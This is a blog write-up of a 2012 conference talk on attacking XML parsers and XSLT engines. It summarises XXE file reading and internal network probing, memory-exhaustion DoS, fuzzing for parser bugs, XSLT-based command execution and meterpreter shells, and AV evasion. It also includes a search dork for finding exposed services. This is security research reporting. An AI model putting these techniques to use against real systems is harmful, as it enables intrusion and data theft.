Please consider donating:


HITB2012AMS Day 2 – Attacking XML Processing

Attacking XML Processing

Dressed in a classy Corelan Team T-Shirt, Nicolas Grégoire kicks off his presentation by introducing himself. Nicolas has been asked by a customer to audit some XML-DSig applications 18 months ago and found a number of bugs. This triggered him to do more research on this topic.

20120525 142727

This technology is present in a LOT of applications today.

XML 101

Nicolas continues by explaining some basics about the eXtensible Markup Language,  how XML documents are structured and what the purpose is of using multiple namespaces.  Namespaces are there to avoid ambiguities, but you can also use namespaces to trigger some specific features.  You can, for example, call PHP code from xslt.

In a valid XML document, you can find more than just data.  You can find XSLT code, define some grammar, and include processing instructions.  Parsers should be aware of this to avoid issues.

Rps20120525 143734 111

XML is used in a lot of technologies (svg, soap, xml-rpc, xslt, xkms, saml, wsdl, rest, and so on). Microsoft Lync online service uses XML to enable dial-in conferencing.  W3C uses it in it’s online xslt 2.0 service, allowing you to upload files, potentially leading to java code execution on the server side (not tested).  The following simple google dork might get you more information about other services : inurl:”xslurl=http”

When auditing an app that parses xml, you should ask yourself the following questions, Nicolas continues:

  • What are the vectors used for xml data ?
  • Is the data being processed ?  If so, by who/where (client/server/gw) ?
  • What is the attack surface ?
  • What are the processing points.  If you can submit data, does it get executed or not ?   If you can submit grammar, will it resolve external entities ?  If you can provide xslt code, check what extensions are available (to access databases, or run java code)

An interesting example is : Wikipedia allows you to upload an svg file, and transforms it into a png.   In other words, it parses and converts the svg into an image.

Nicolas explains that all demos in the presentation are based on Atom feeds.  He wrote a couple of Feed readers one using perl, another one in PHP and a third one in JSP / Java.


XDP is a container for PDF/XFA documents.  Nicolas used a 3 year old vulnerability (cooltype) and attempted to avoid AV detection by using encapsulation.  By modifying the metasploit module for this particular exploit, he managed to evade all 43 AV engines.

Rps20120525 144907 624

Temporary DoS

By creating a temporary DoS condition, you may be able to detect the fact that something is being processed in a black box audit scenario (similar to the benchmark trick for SQL injection).  He demonstrated a couple of ways that would lead to the allocation of multiple Gigs of Ram.

XXE Exploitation

XML External Entitiies is probably the most common XML vulnerability, Nicolas explains.  You could basically specify a filename (/etc/passwd) in an entity, and every time it gets used, the output gets replaced by the contents of the file.  RESTlet, Yandex, OpenOffice, SharePoint, DotNetNuke, IceWarp are just a couple of applications that speak REST and might be vulnerable to XXE attacks.

XXE attacks can be very powerful.  You can easily hit the internal network, do banner grabbing (by using something like ssh://ip:22 for example) and do blind attacks.  In certain scenarios,  you can use the file handler to steal ntlm hashes or “pass the hash”, or list directories to get more information.   Depending on the available extensions, there’s a lot more you can do.   Successful exploitation depends on

  • XML parser
  • the OS
  • programming language used
  • application specific features  (for example, use the fact that php returns base64 encoded data to read a file that contains null bytes)
Nicolas performed some really impressive demo’s using a variety of techniques, allowed to read files, memory and connect to ports on other hosts.

Rps20120525 145926

XSLT Exploitation

The purpose of XSLT is to transform xml into something else.   XSLT is Turing Complete.  The main use of XSLT is to display XML to humans, but it can also be used to extract data, convert between formats. You can find XSLT parsers in Web Apps, browsers, Database servers (Oracle for example), Word Processors, XML-DSig.  Nicolas played with a bunch of apps and discover bugs in Xalan-J, Sablotron, libxslt, transformix, XT, Adobe, Oracle-C, 4Suite, Altova.

First, he performed some basic mutation based fuzzing. He basically took a bunch of XSLT engines.  Get a bunch of input files (download from the internet), use a diversifier (Radamsa), set up monitoring… and go.  He explains that he typically takes 5000 files, and let’s radamsa create 10000000 files.   To monitor, he used valgrind and AddressSanitizer.  Using this approach, he found a couple of bugs (most of them are not patched yet) in Mozilla Firefox, Webkit, Opera, Oracle (ORA-07445).  To trigger the xslt parser in Oracle, you can use the code in the screenshot below.  At the bottom of the screenshot, you can see it can lead to control of FP:

Rps20120525 150835 240

The problem with XSLT is that it is a functional language.  There is no loop functionality (while, for, …) and every variable is read only.   This complicates brute forcing and reading STDOUT.  You can, however, use a XSL for-each location wrapper to read something from another file.  This simulates a “for” loop.  If you combine this with SQL extensions, you would be able to attack internal databases and dump tables.

The “while” loop, needed to read stdout, is a bit more complex to implement.   The idea is to use a XSLT Loop Compiler (by @obqo).  It exposes , , and , but that is not valid xslt code.  After compiling, it gets converted into valid a valid XSLT file, but the resulting file will be quite large.

Combining a source with commands you want to run, the code that includes the loops (to execute and return the output), you can run arbitrary commands on a remote system and retrieve the output.

Rps20120525 151648 601

On dec 30 2011, at BerlinSides, Nicolas claimed that he couldn’t find a way to execute Java in XSLT, but he was contacted by @mihi42 who shared some details on how to do it.   Nicolas ends the presentation by demonstrating how to get meterpreter shells by embedding php/java code in xlst files.  The metasploit module, to create xslt files for PHP and Java, should be released shortly.

PHP Meterpreter :

Rps20120525 152302 913

Java :

Rps20120525 152512 113



XML is everywhere.  You should understand that it’s more that just data. DTD and XXE attacks have been known for more than 10 years, and the offensive side is progressing quickly (because XML is increasing popularity)

You can get more info about his work, the results of his research and some source code on  (which, ironically, is based on a Wiki that uses REST (a.o.) and IS vulnerable to certain types of attacks).

Brilliant work !





© 2012, Peter Van Eeckhoutte (corelanc0d3r). All rights reserved.

Comments are closed.

Corelan Training

We have been teaching our win32 exploit dev classes at various security cons and private companies & organizations since 2011

Check out our schedules page here and sign up for one of our classes now!


Want to support the Corelan Team community ? Click here to go to our donations page.

Want to donate BTC to Corelan Team?

Your donation will help funding server hosting.

Corelan Team Merchandise

You can support Corelan Team by donating or purchasing items from the official Corelan Team merchandising store.

Protected by Copyscape Web Plagiarism Tool

Corelan on Slack

You can chat with us and our friends on our Slack workspace:

  • Go to our facebook page
  • Browse through the posts and find the invite to Slack
  • Use the invite to access our Slack workspace
  • Categories